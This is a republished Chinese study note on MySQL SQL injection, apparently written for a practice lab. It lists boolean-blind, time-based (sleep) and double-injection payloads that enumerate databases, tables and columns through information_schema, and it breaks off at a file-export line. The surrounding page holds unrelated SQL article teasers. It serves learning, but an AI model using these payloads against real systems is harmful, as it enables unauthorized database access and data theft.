当前位置：移动技术网 > IT编程>数据库>MSSQL > SQL注入学习笔记（一）

SQL注入学习笔记（一）

2018年12月27日 | 移动技术网IT编程 | 我要评论

本田crv导航,长安医院,钟宝爱

空格是%20，单引号是%27，井号是%23，双引号是%22 //常见urlencode

order by 3 //猜字段个数

select 1, 2, 3 //增加临时列

mysqli_fetch_array(conn,sql) //返回第一行记录

concat_ws(char(32,58,32), ‘语句1’, ‘语句2’…) //连接成字符串

limit 0,1 //选定待查询的记录行

substr((%s),1,1)

//爆库, 爆表, 爆字段

database: information_schema(包含了mysql服务器所有信息)

table: schemata (schema_name)

tables (table_schema, table_name)

columns (table_schema, table_name, column_name)

//布尔盲注

and length(database())>=0 %23

and ascii(substr(database(),1,1))>=0 %23

and (select count(table_name) from information_schema.tables where table_schema=’security’)>=0 %23

and (select length(table_name) from information_schema.tables where table_schema=’security’ limit 0,1)>=0 %23

and ascii(substr(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1)>=0 %23

and (select count(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)>=0 %23

and (select length(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1)>=0 %23

and ascii(substr((select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),1,1))>=0 %23

//基于时间盲注

and if((注入布尔判断语句), 1, sleep(5)) %23

//聚合函数+分组语句->双注入

union select 1 from (select count(*), concat(floor(rand()*2), (注入爆数据语句))a from information_schema.tables group by a)b%23

//导出文件

select “

您可能感兴趣的文章:

如对本文有疑问，请在下面进行留言讨论，广大热心网友会与你互动！！点击进行留言回复

YourSQLDba低版本的一个Bug的浅析

帮人分析解决一个YourSQLDba备份报错问题，个人觉得有点意思，顺手记录一下分析思路，大体解决思路如下：首先，找到YourSQLDba作业Your... [阅读全文]
sql某个日期是当年的第几周

/* *周一作为一周的开始 *当年的1月1号所在的周算作第一周 */ CREATE function GetWeekIndexFirstDate ( @... [阅读全文]
sqlserver 数据库迁移

业务情景客户环境是系统A的1.0版本，开发环境是系统A的2.0版本。2.0版本对于数据库有部分变更（主要是新增表和字段，不涉及字段删除和变更）。这个时... [阅读全文]
数据库SQL---范式

1、数据冗余导致的问题：冗余存储、更新异常、插入异常、删除异常。 2、函数依赖：一种完整性约束。在关系模式r(R)中，α属于R，β属于R。 1）α函数... [阅读全文]
sql server如何用不同语种语言显示报错的错误消息

问题：生产环境的操作系统和数据库可能是英文版的，而我们的母语是中文，如果英语能力差点，可能有时对英语环境下的数据库脚本报错的英文提示看不懂，如果直接拿英... [阅读全文]
数据库SQL---查询

1、查询所有列 select *from emp;--*表示所有的，from emp表示从emp表中查询。 2、查询指定列 select empno,e... [阅读全文]
数据库SQL---数据库、基本表、视图、索引的定义、修改、删除

1、SQL（结构化查询语言）的组成：数据定义语言DDL、数据操纵语言DML、数据控制语言DCL、其他。 2、SQL语言的功能： 1）数据查询：SELEC... [阅读全文]
对比索引、视图、游标、存储过程和触发器

1、索引 1-1、索引的概述我们把一个表中的一列或者多列和列中元素所在表中记录的物理地址组合成一个新的表。这个表的记录大致为列的内容和该列所在记录的物... [阅读全文]
在 Azure CentOS VM 中配置 SQL Server 2019 AG - (上)

前文假定您对Azure和SQL Server HA具有基础知识假定您对Azure Cli具有基础知识目标是在Azure Linux VM上创建一个... [阅读全文]
在 Azure CentOS VM 中配置 SQL Server 2019 AG - (下)

配置 Internal Load Balancer 创建load balancer 我的三台VM都位于sqldemoVNET/linuxsubnet子网... [阅读全文]

网友评论


验证码：

SQL注入学习笔记（一）

2018年12月27日 | 移动技术网IT编程 | 我要评论

您可能感兴趣的文章:

相关文章:

网友评论